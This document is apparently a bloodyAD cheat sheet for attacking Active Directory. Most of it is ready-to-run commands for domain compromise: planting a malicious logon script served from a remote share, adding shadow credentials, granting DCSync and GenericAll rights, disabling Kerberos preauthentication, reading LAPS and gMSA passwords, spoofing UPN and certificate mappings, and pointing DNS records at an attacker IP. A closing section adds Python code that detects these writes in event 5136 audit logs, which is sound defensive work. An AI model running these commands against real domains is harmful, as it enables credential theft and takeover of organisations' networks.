Latest Windows and Linux versions can be downloaded from here.
New techniques can be found on this Twitter profile.
Official wiki.
Enumeration
Check user:
bloodyAD --host $IP -d domain.local -u username -p 'password' get object 'TARGET_USER'
Check groups:
bloodyAD --host $IP -d domain.local -u username -p 'password' get object 'Domain Admins'
Check objects, type can be a container too:
bloodyAD --host $IP -d domain.local -u username -p 'password' get children 'DC=domain,DC=local' --type computer
Password policy check:
bloodyAD --host $IP -d domain.local -u username -p 'password' get object 'DC=domain,DC=local' --attr minPwdLength
UAC check:
bloodyAD --host $IP -d domain.local -u username -p 'password' get object 'TARGET_USER' --attr userAccountControl
Change password:
bloodyAD --host $IP -d domain.local -u username -p 'password' set password 'TARGET_USER' 'Password123'
Check all attributes that can be changed; useful in combination with the --include-del parameter:
bloodyAD --host $IP -d domain.local -u username -p 'password' get writable --detail
Check OUs that can be changed:
bloodyAD --host $IP -d domain.local -u username -p 'password' get writable --otype OU
Machine account quota check:
bloodyAD --host $IP -d domain.local -u username -p 'password' get object 'DC=dc,DC=dc' --attr ms-DS-MachineAccountQuota
bloodyAD --host $IP -d domain.local -u username -p 'password' set object 'DC=dc,DC=dc' ms-DS-MachineAccountQuota -v 10
LDAP queries:
bloodyAD --host $IP -d domain.local -u username -p 'password' msldap -h
Privilege Escalation
Add user to the group:
bloodyAD --host $IP -d domain.local -u username -p 'password' add groupMember 'TARGET_GROUP' 'TARGET_USER'
Set malicious logon script:
bloodyAD --host $IP -d domain.local -u username -p 'password' set object 'TARGET_USER' scriptpath -v '\\$IP\malicious.bat'
Set SPN, for Kerberoast or RBCD:
bloodyAD --host $IP -d domain.local -u username -p 'password' set object 'TARGET_USER' servicePrincipalName -v 'cifs/service'
Set delegation:
bloodyAD --host $IP -d domain.local -u username -p 'password' add uac 'TARGET_USER' -f TRUSTED_TO_AUTH_FOR_DELEGATION
Set user as owner:
bloodyAD --host $IP -d domain.local -u username -p 'password' set owner 'TARGET_GROUP' 'TARGET_USER'
Set GenericAll privileges:
bloodyAD --host $IP -d domain.local -u username -p 'password' add genericAll $DN 'TARGET_USER'
Shadow credentials:
bloodyAD --host $IP -d domain.local -u username -p 'password' add shadowCredentials 'TARGET_USER'
Change account status:
bloodyAD --host $IP -d domain.local -u username -p 'password' remove uac 'TARGET_USER' -f ACCOUNTDISABLE
Change account status, for ASREPRoast:
bloodyAD --host $IP -d domain.local -u username -p 'password' add uac 'TARGET_USER' -f DONT_REQ_PREAUTH
Read gMSA password:
bloodyAD --host $IP -d domain.local -u username -p 'password' get object 'TARGET_SERVICE' --attr msDS-ManagedPassword
Read LAPS password:
bloodyAD --host $IP -d domain.local -u username -p 'password' get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
UPN spoofing; the attribute name can be changed to any other attribute:
bloodyAD --host $IP -d domain.local -u username -p 'password' set object 'TARGET_USER' mail -v 'administrator@domain.local'
bloodyAD --host $IP -d domain.local -u username -p 'password' get object 'TARGET_USER' --attr userPrincipalName
ESC14, scenario B:
bloodyAD --host $IP -d domain.local -u username -p 'password' set object 'TARGET_USER' altSecurityIdentities -v 'X509:<RFC822><username@domain.local>'
Set DCSync rights on object, it can also be used for users:
bloodyAD --host $IP -d domain.local -u username -p 'password' add dcsync 'TARGET_OBJECT'
DNS spoofing:
bloodyAD --host $IP -d domain.local -u username -p 'password' add dnsRecord 'TARGET_RECORD' $ATTACKER_IP
Vulnerability check for Windows Server 2025:
bloodyAD --host $IP -d domain.local -u username -p 'password' add badSuccessor PENTEST
Check tombstoned, recycled or deleted objects:
bloodyAD --host $IP -u username -d domain.local -p 'password' get search -c 1.2.840.113556.1.4.2064 --resolve-sd --attr ntsecuritydescriptor --base 'CN=Deleted Objects,DC=domain,DC=local' --filter "(objectClass=container)"
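Detection side of the attribute writes listed under Privilege Escalation, as an added example that is not part of the original page or of bloodyAD: it scans directory-change audit records (Windows event 5136) for writes to those attributes and decodes userAccountControl changes into the flags that were set or cleared. The JSON-lines export format, the decimal AttributeValue encoding, the old-value-before-new-value ordering, the actor name and the sample records are assumptions constructed for illustration.

```python
import json

# Attributes written by commands on this page, and why a defender cares.
WATCHED = {
    "scriptpath": "logon script set",
    "serviceprincipalname": "SPN set",
    "msds-keycredentiallink": "key credential added (shadow credentials)",
    "altsecurityidentities": "certificate mapping set",
    "ms-ds-machineaccountquota": "machine account quota changed",
    "ntsecuritydescriptor": "owner or ACL changed",
}
# userAccountControl bits for the three flags named on this page.
UAC_FLAGS = {0x2: "ACCOUNTDISABLE", 0x400000: "DONT_REQ_PREAUTH",
             0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION"}
ADDED, DELETED = "%%14674", "%%14675"  # event 5136 OperationType codes

def uac_names(value):
    """Decode a decimal userAccountControl string into watched flag names."""
    return {name for bit, name in UAC_FLAGS.items() if int(value) & bit}

def detect(lines):
    """Return (actor, object DN, finding) for each suspicious 5136 record."""
    findings, old_uac = [], {}
    for ev in map(json.loads, lines):
        attr = ev["AttributeLDAPDisplayName"].lower()
        who, dn = ev["SubjectUserName"], ev["ObjectDN"]
        key = (ev["OpCorrelationID"], dn)
        if attr == "useraccountcontrol" and ev["OperationType"] == DELETED:
            old_uac[key] = uac_names(ev["AttributeValue"])  # assumed: old value first
        elif attr == "useraccountcontrol":
            new, old = uac_names(ev["AttributeValue"]), old_uac.pop(key, set())
            findings += [(who, dn, f"UAC flag set: {f}") for f in sorted(new - old)]
            findings += [(who, dn, f"UAC flag cleared: {f}") for f in sorted(old - new)]
        elif attr in WATCHED and ev["OperationType"] == ADDED:
            findings.append((who, dn, WATCHED[attr]))
    return findings

FIELDS = ("ObjectDN", "AttributeLDAPDisplayName", "OperationType",
          "AttributeValue", "OpCorrelationID")
SVC, USR = "CN=svc,DC=domain,DC=local", "CN=user1,DC=domain,DC=local"
ROWS = [  # constructed sample records, not real logs; actor "jdoe" is made up
    (SVC, "userAccountControl", DELETED, "512", "c1"),
    (SVC, "userAccountControl", ADDED, "4194816", "c1"),
    (USR, "scriptPath", ADDED, "\\\\fileserver\\share\\logon.bat", "c2"),
    (USR, "description", ADDED, "helpdesk note", "c3"),
    (USR, "userAccountControl", DELETED, "514", "c4"),
    (USR, "userAccountControl", ADDED, "512", "c4"),
]
SAMPLE = [json.dumps(dict(zip(FIELDS, r), SubjectUserName="jdoe")) for r in ROWS]
```

Event 5136 is only written when Audit Directory Service Changes is enabled and the object's SACL audits the write, so these findings depend on that audit configuration being in place.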